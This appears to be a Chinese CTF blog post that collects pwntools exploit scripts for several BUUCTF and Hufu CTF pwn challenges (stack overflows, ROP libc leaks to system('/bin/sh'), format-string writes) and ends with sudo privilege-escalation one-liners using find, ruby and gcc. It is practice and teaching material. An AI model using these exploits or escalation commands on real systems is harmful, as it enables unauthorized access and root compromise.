不记得是什么时候打的比赛,自己搭的博客崩了,搬来csdn记录一下
虎符CTF 复现
0x01
任意地址写
from pwn import*
from sys import*
p=remote('39.97.210.182',10055)#p=remote()39.97.210.182 10055
#p=process("./chall")
elf=ELF('chall')
#libc = ELF('libc6_2.27-3ubuntu1_amd64.so')
#libc = ELF('./libc-2.23.so')
#libc = ELF('./libc.so.6')
context(os='linux',arch='amd64',log_level='debug')
p.recvuntil("I placed the target near: ")
cmd="cat flag>&0"
add = p.recvuntil("\n")
#
base=string.atoi(add,16)
base =base -0x0809c0
one = base +0xf1147 # 0x4526a#0x45216#0xf1147#0x10a38c #0x4f2c5# 0x4f2c5 0x4f322 0x10a38c #0x4f322# #0x4526a
pass_call = base +8341968# 0x7f49d0 #0x7f49d0
print hex(pass_call)
pass_call = eval(str(pass_call))
print "base:"+ hex(base)
print "one:"+hex(one)
print pass_call
p.recvuntil("shoot!\n")
p.sendline(str(pass_call))#+"cat flag >&0")
p.sendlineafter("biang!\n",p64(one)[0]) #0x10a38c 0x4f322
p.sendlineafter("biang!\n",p64(one)[1]) #
#gdb.attach(p)
p.sendlineafter("biang!\n",p64(one)[2]) #
#p.recvuntil("bye~\n")
#p.sendline(cmd)
p.interactive()
本地通了,远程mmp,偏移不一样还是啥的 。
堆块分配函数
size = sub_DC7();
if ( size > 0x100 && (unsigned int)size <= 0xFFF )
{
ptr[v2] = malloc(0x28uLL);
*((_QWORD *)ptr[v2] + 4) = size;
v0 = ptr[v2];
v0[3] = malloc(size); // ptr[3] --> v0[3] 新开辟的size大小堆块指针在ptr上
memset(ptr[v2], 0, 0x14uLL);
read_0x10_to_ptr(ptr[v2]);
puts("Key: ");
for ( j = 0; j <= 15; ++j )
printf("%02x ", *((unsigned __int8 *)ptr[v2] + j));// 打印出 fd 和bk
//
//
printf("\nBox ID: %d\n", v2);
}
buuctf 刷题缓解心痛心情
pwn1_sctf_2016
C++ 写的,害,输入I, 会转换为you,所以有溢出啊,还有后面函数
from pwn import *
from sys import *
debug=1
context.log_level='debug'
context.arch='amd64'
if debug:
p=process("./pwn1_sctf_2016")
else:
host = "node3.buuoj.cn"
port = 28912
p=remote(host, port)
door = 0x8048f0d
pay =20*"I"+"aaaa"+p32(door)
gdb.attach(p,"b *0x80491DE")
p.sendline(pay)
p.interactive()
ciscn_2019_n_1 浮点数查看
from pwn import *
from sys import *
debug=0
context.log_level='debug'
context.arch='amd64'
if debug:
p=process("./ciscn_2019_n_1")
else:
host = "node3.buuoj.cn"
port =29648
p=remote(host, port)
pay = p64(0)*4+p32(0)*3+p64(0x41348000)
#gdb.attach(p,"b *0x80491DE")
p.sendline(pay)
p.interactive()
ciscn_2019_c_1 泄露 打system 需要进行一个栈对齐,不能打onegadget
from pwn import *
from sys import *
debug=0
context.log_level='debug'
context.arch='amd64'
if debug:
p=process("./ciscn_2019_c_1")
else:
host = "node3.buuoj.cn"
port =25934
p=remote(host, port)
pop_rdi_t=0x400c83
put_got = 0x602020
put_plt = 0x4006E0
main= 0x400B28
pay = "a"*0x58 + p64(pop_rdi_t)+p64(put_got)+p64(put_plt)+p64(main)
#gdb.attach(p)
p.recvuntil("Input your choice!\n")
p.sendline(str(1))
p.recvuntil("Input your Plaintext to be encrypted\n")
p.sendline(pay)
put_add = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
base = put_add-0x0809c0
one = base + 0x4526a#0xf1147#0x45216#,0x4526a#0xf02a4#
print "put:"+hex(put_add)
print "base:"+hex(base)
str_bin = base+0x1b3e9a#0x18cd57
system = base + 0x04f440#0x045390
ret = 0x4006b9 # ubuntu 18 需要进行一个栈调试,因为在调用system的时候需要进行栈对齐
pay = "a"*0x58 +p64(ret)+ p64(pop_rdi_t)+p64(str_bin)+p64(system)
p.recvuntil("Input your choice!\n")
p.sendline(str(1))
p.recvuntil("Input your Plaintext to be encrypted\n")
p.sendline(pay)
p.interactive()
babyrop
这个题的关键在于绕过strncmp,strlen函数遇到‘\0’截断,但read 函数遇到‘\n’才截断,然后read函数有一个溢出可以把v5覆盖掉,v5 返回到main函数 ,可以控制另一个函数溢出。
nt __cdecl sub_804871F(int a1)
{
size_t v1; // eax
char s; // [esp+Ch] [ebp-4Ch]
char buf[7]; // [esp+2Ch] [ebp-2Ch]
unsigned __int8 v5; // [esp+33h] [ebp-25h]
ssize_t v6; // [esp+4Ch] [ebp-Ch]
memset(&s, 0, 0x20u);
memset(buf, 0, 0x20u);
sprintf(&s, "%ld", a1);
v6 = read(0, buf, 0x20u); // 溢出到v5
buf[v6 - 1] = 0;
v1 = strlen(buf); // 让strlen(buf) 为0
if ( strncmp(buf, &s, v1) ) // 读入到buf
exit(0);
write(1, "Correct\n", 8u);
return v5;
ssize_t __cdecl sub_80487D0(char a1) 这个a1 就是返回的V5了
{
ssize_t result; // eax
char buf; // [esp+11h] [ebp-E7h]
if ( a1 == '' )
result = read(0, &buf, 0xC8u);
else
result = read(0, &buf, a1); // 溢出
return result;
}
比较操蛋的是运程的 lib库,一定要远程去查。
from pwn import *
from sys import *
debug=0
context.log_level='debug'
context.arch='amd64'
if debug:
p=process("./babyrop")
else:
host = "node3.buuoj.cn"
port =27828
p=remote(host, port)
libc = ELF('./libc6_2.23-0ubuntu10_i386.so') #不是这个库,别瞎搞
#gdb.attach(p)
put_plt = 0x8048548
put_got = 0x8049FD4
main = 0x8048825
pay = "\x00"+"\xff"*8
p.sendline(pay)
p.recvuntil("Correct\n")
pay = 0xe7 *"a"+ "aaaa"+p32(put_plt)+p32(main)+p32(put_got)
p.sendline(pay)
put_add =u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
base = put_add -0x05f140# libc.symbols["puts"]#0x05fca0
print "put:"+hex(put_add)
print "base:"+hex(base)
pay = "\x00"+"\xff"*8
p.sendline(pay)
str_bin = base +0x15902b# libc.search("/bin/sh").next()#0x15ba0b
system = base + 0x03a940#libc.symbols["system"]#0x03ada0
one = base+0x5fbc6#0x5fbc5#0x3ac69#0x3ac62#0x3ac5e #0x3ac5c#
pay = 0xe7 *"a"+ "aaaa"+p32(system)+p32(0xbeeefff)+p32(str_bin)
#pay = 0xe7 *"a"+ "aaaa"+p32(one)
p.sendline(pay)
#input()
p.interactive()
网速慢真的是会让人上火 ,tnnnnnnnnnnd,f*********
ciscn_2019_en_2 和ciscn_2019_c_1 一模一样
from pwn import *
from sys import *
debug=0
context.log_level='debug'
context.arch='amd64'
if debug:
p=process("./ciscn_2019_en_2")
else:
host = "node3.buuoj.cn"
port =27611
p=remote(host, port)
pop_rdi_t=0x400c83
put_got = 0x602020
put_plt = 0x4006E0
main= 0x400B28
pay = "a"*0x58 + p64(pop_rdi_t)+p64(put_got)+p64(put_plt)+p64(main)
#gdb.attach(p)
p.recvuntil("Input your choice!\n")
p.sendline(str(1))
p.recvuntil("Input your Plaintext to be encrypted\n")
p.sendline(pay)
put_add = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
base = put_add-0x0809c0
one = base + 0x10a38c#0x4f322#0x4f2c5# 0x4526a#0xf1147#0x45216#,0x4526a#0xf02a4#
print "put:"+hex(put_add)
print "base:"+hex(base)
str_bin = base+0x1b3e9a#0x18cd57
system = base + 0x04f440#0x045390
ret = 0x4006b9 # ubuntu 18 zhan tiao zheng
pay = "a"*0x58 +p64(ret)+ p64(pop_rdi_t)+p64(str_bin)+p64(system)
#pay = "a"*0x58 +p64(ret)+ p64(one)
p.recvuntil("Input your choice!\n")
p.sendline(str(1))
p.recvuntil("Input your Plaintext to be encrypted\n")
p.sendline(pay)
p.interactive()
溜了溜了,该玩耍去了
get_started_3dsctf_2016
溢出,后面函数,需要注意的是参数要传对,才能执行后门函数
void __cdecl get_flag(int a1, int a2)
{
int v2; // eax
int v3; // esi
unsigned __int8 v4; // al
int v5; // ecx
unsigned __int8 v6; // al
if ( a1 == 0x308CD64F && a2 == 0x195719D1 ) // 这里的 就是两个参数的值要传对啊,不对就废了
{
v2 = fopen("flag.txt", "rt");
v3 = v2;
v4 = getc(v2);
if ( v4 != '\xFF' )
{
v5 = (char)v4;
do
{
putchar(v5);
v6 = getc(v3);
v5 = (char)v6;
}
while ( v6 != 255 );
}
fclose(v3);
}
}
#!/usr/bin/env python2
# execve generated by ROPgadget
from pwn import *
from sys import *
from struct import pack
debug=0
context.log_level='debug'
context.arch='i386'
if debug:
o=process("./get")
gdb.attach(o,"b *0x8048A3B")
else:
host = "node3.buuoj.cn"
port =26456
o=remote(host, port)
ret = 0x8048A40
flag = 0x80489A0
p = 'a'* 56+p32(ret)+p32(flag)+p32(0x804e6a0)+p32(0x308CD64F)+p32(0x195719D1)
o.sendline(p)
o.interactive()
[第五空间2019 决赛]PWN5
绕过if 条件,格式化字符串可写,修改unk_804C044内容即可
srand(v1);
fd = open("/dev/urandom", 0);
read(fd, &unk_804C044, 4u);
printf("your name:");
read(0, &buf, 0x63u);
printf("Hello,");
printf(&buf);
printf("your passwd:");
read(0, &nptr, 0xFu);
if ( atoi(&nptr) == unk_804C044 )
{
puts("ok!!");
system("/bin/sh");
}
这道题可以收获的是32位格式化写的时候,payload的构造
p32(add1)+p32(add2)+p32(add3)+"%10$hn%11$hn%12$hn" #hn是双字节写
如果是特定字符写的话,就要巧妙的构造了,比如
p32(add)+"%"+str(xxxxx)+"c%xx$hn"
p32(0x804C044)+p32(0x804C044+2)+"%10$hn" +"%11$hn" #hn是双字节写
#!/usr/bin/env python2
# execve generated by ROPgadget
from pwn import *
from sys import *
from struct import pack
debug=0
context.log_level='debug'
context.arch='i386'
if debug:
o=process("./pwn5")
gdb.attach(o,"b *0x080492A6")
else:
host = "node3.buuoj.cn"
port =28330
o=remote(host, port)
pay = p32(0x804C044)+p32(0x804C044+2)+"%10$hn" +"%11$hn" #hn是双字节写
o.sendlineafter("your name:",pay)
pa = p32(0x80008)
o.sendlineafter("your passwd:","524296")
o.interactive()
提权
使用gtfo查找提权命令,网址为:https://gtfobins.github.io/
查看系统用户信息:
cat /etc/passwd|grep /bin/bash
sudo -l 查看特权
find命令提权,hackNos-boat是用户名:
sudo -u hackNos-boat /usr/bin/find . -exec /bin/bash \; -quit
ruby 命令提权,hunter 是用户名:
sudo -u hunter /usr/bin/ruby -e 'exec "/bin/bash"'
gcc 提权到root:
sudo /usr/bin/gcc -wrapper /bin/bash,-s .